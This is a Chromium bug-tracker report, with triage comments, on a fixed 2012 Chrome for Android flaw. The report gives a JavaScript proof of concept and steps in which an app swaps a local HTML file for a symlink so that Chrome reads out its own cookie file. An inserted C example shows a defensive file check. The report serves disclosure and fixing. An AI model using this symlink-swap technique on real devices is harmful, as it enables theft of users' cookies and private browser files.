Issue 144866

Starred by 2 users

Issue metadata

Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Android
Pri: 1
Type: Bug-Security


Security: Chrome for Android Bypassing SOP for Local Files By Symlinks

Reported by websec02...@gmail.com, Aug 26 2012

Issue description

VULNERABILITY DETAILS
Chrome for Android seems to forbid a local file from reading another
file, except for the originating file itself (*). However, it is
possible to circumvent the restriction by a trick using a symlink.

(*) http://code.google.com/p/chromium/issues/detail?id=37586

This issue enables malicious Android apps to steal Chrome's
private files such as Cookie file, bookmark file, and so on.

As an example, steps to steal Chrome's Cookie file are described
below:

1. An attacker's app creates a malicious HTML file, and makes
   Chrome load its URL with file: scheme. The malicious HTML
   contains JavaScript code which, a few seconds later, tries
   to read the content of the same URL with the malicious HTML
   itself by XHR.

   <body>
   <u>Wait a few seconds.</u>
   <script>
   // Re-read this page's own file: URL, the one read that the
   // local-file restriction still permits.
   function doitjs() {
     var xhr = new XMLHttpRequest();
     xhr.onload = function() {
       alert(xhr.responseText);  // shows whatever the path resolves to now
     };
     xhr.open('GET', document.URL);
     xhr.send(null);
   }
   // The delay leaves time for the file to be replaced (step 2).
   setTimeout(doitjs, 8000);
   </script>
   </body>

2. Before XHR fires, the attacker's app replaces the malicious
   HTML file with a symlink pointing to Chrome's Cookie file.

3. When XHR fires, Chrome follows the symlink and provides the
   content of Chrome's Cookie file to the malicious HTML.

VERSION
Chrome Version: Chrome for Android v18.0.1025123
Operating System: confirmed on Android 4.0.4 (Samsung Galaxy Nexus)

REPRODUCTION CASE
Sample code for a malicious Android app is attached.

NOTE
This issue was initially reported to security@google.com on Aug. 11
2012, but recently I heard from Google security team that the issue
might not be filed in Chromium bug database. So now I re-submit
the issue here which should be a legitimate place for reporting
Chrome bugs.

This issue is a bit related to issue #141889 in terms of using
symlink. So, like issue #141889, the issue described in this
report might be already fixed (but unreleased).


 
Attachment: poc3.txt (2.6 KB)
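As an added example (not Chrome's code and not from the report; comment 3 only says the fixed build denies the load with net::ERR_ACCESS_DENIED, so the policy below is an assumption, not Chrome's actual patch), a C check a file: loader could apply to close the swap window in steps 1-3: refuse a symlink at the final component with O_NOFOLLOW, require a regular file, confine the fully resolved path to an allowed directory, and read through the fd already held instead of reopening the path. The directory and file names in the demo are constructed.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Allow a file: load of `path` only if it is a regular file, not a symlink, and
 * resolves inside `root` (assumed not to be "/"). The caller reads through the
 * returned fd, so swapping the path afterwards cannot redirect the read; -1 = deny. */
int open_local_file_for_read(const char *root, const char *path) {
    char rr[PATH_MAX], rp[PATH_MAX];
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC); /* ELOOP on a symlink */
    if (fd < 0) return -1;
    if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) &&
        realpath(root, rr) && realpath(path, rp) &&          /* resolve every component */
        strncmp(rp, rr, strlen(rr)) == 0 && rp[strlen(rr)] == '/')
        return fd;
    close(fd);
    return -1;
}

/* Constructed scenario from the report: a regular HTML file inside the app dir and
 * a symlink beside it pointing outside. Returns 1 if only the plain file is allowed. */
int demo_symlink_swap(void) {
    char root[] = "/tmp/sop_demo_XXXXXX", html[PATH_MAX], lnk[PATH_MAX], tgt[PATH_MAX];
    int ok = 0;
    if (!mkdtemp(root)) return 0;
    snprintf(html, sizeof html, "%s/evil.html", root);
    snprintf(lnk, sizeof lnk, "%s/swapped.html", root);
    snprintf(tgt, sizeof tgt, "%s.cookies", root);  /* sibling of root: shares its prefix but is outside */
    FILE *f = fopen(html, "w"); if (f) { fputs("<html>", f); fclose(f); }
    f = fopen(tgt, "w"); if (f) { fputs("session=1", f); fclose(f); }
    if (symlink(tgt, lnk) == 0) {               /* step 2 of the report: the swap */
        int fd_html = open_local_file_for_read(root, html);
        int fd_lnk = open_local_file_for_read(root, lnk);
        ok = fd_html >= 0 && fd_lnk < 0;
        if (fd_html >= 0) close(fd_html);
    }
    unlink(html); unlink(lnk); unlink(tgt); rmdir(root);
    return ok;
}

int main(void) {
    printf("plain file allowed, symlink denied: %d\n", demo_symlink_swap());  /* 1 */
    return 0;
}
```

The prefix check deliberately tests for a trailing '/' so that a sibling such as root.cookies, which shares the root's string prefix, is still rejected.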

Comment 1 by palmer@google.com, Aug 27 2012

Cc: srikanth@chromium.org klo...@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals OS-Android SecSeverity-Medium Mstone-18 SecImpacts-Stable
Owner: palmer@chromium.org
Status: Assigned
Thanks for reporting this, Takeshi!

Assigning to myself to make sure it's resolved. If not, I'll open it up to klobag and srikanth for assignment to whoever the right person is. Expect to see an update later on today.

Comment 3 by palmer@google.com, Aug 27 2012

Cc: nileshagrawal@chromium.org
Status: FixUnreleased
As of Chrome for Android 18.0.1025289, this issue is resolved. Chrome cannot load HTML_PATH (/data/data + MY_PKG + ...) due to net::ERR_ACCESS_DENIED. An earlier patch by Nilesh, to fix http://code.google.com/p/chromium/issues/detail?id=141889, resolved a whole class of file access attacks.

On an earlier version, 18.0.1025.166 (Official Build 143067), the exploit works perfectly as expected, so I am confident the fix is good. The fixed version should be out soon (early September, they say).

Comment 4 by palmer@chromium.org, Sep 11 2012

Labels: reward-topanel

Comment 5 by palmer@chromium.org, Sep 12 2012

Labels: -reward-topanel reward-unpaid reward-500

Comment 6 by palmer@chromium.org, Sep 13 2012

Another $500 for Takeshi. Thanks for your good work!

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----

Comment 7 by bugdroid1@chromium.org, Oct 14 2012

Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Labels: -reward-unpaid
Payment in system as part of $2500 batch

Comment 9 by jsc...@chromium.org, Dec 20 2012

Status: Fixed

Comment 10 by bugdroid1@chromium.org, Jan 18 2013

Labels: Restrict-View-EditIssue
Restrict-View-EditIssue is preferred since it allows anyone who can edit an issue (committers and contributors) to view the bug.

Comment 12 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-Internals -SecSeverity-Medium -Mstone-18 -SecImpacts-Stable Security-Severity-Medium M-18 Cr-Internals Security-Impact-Stable Type-Bug-Security

Comment 13 by bugdroid1@chromium.org, Mar 13 2013

Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityTeam
Labels: -Restrict-View-EditIssue

Comment 16 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 17 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-Medium Security_Severity-Medium

Comment 18 by palmer@google.com, Oct 4 2013

Cc: dfalcant...@chromium.org
+dfalcantara FYI

Comment 19 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 21 by sheriffbot@chromium.org, Oct 2 2016

Labels: Restrict-View-SecurityNotify
Labels: allpublic

Comment 23 by sheriffbot@chromium.org, Oct 3 2016

Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
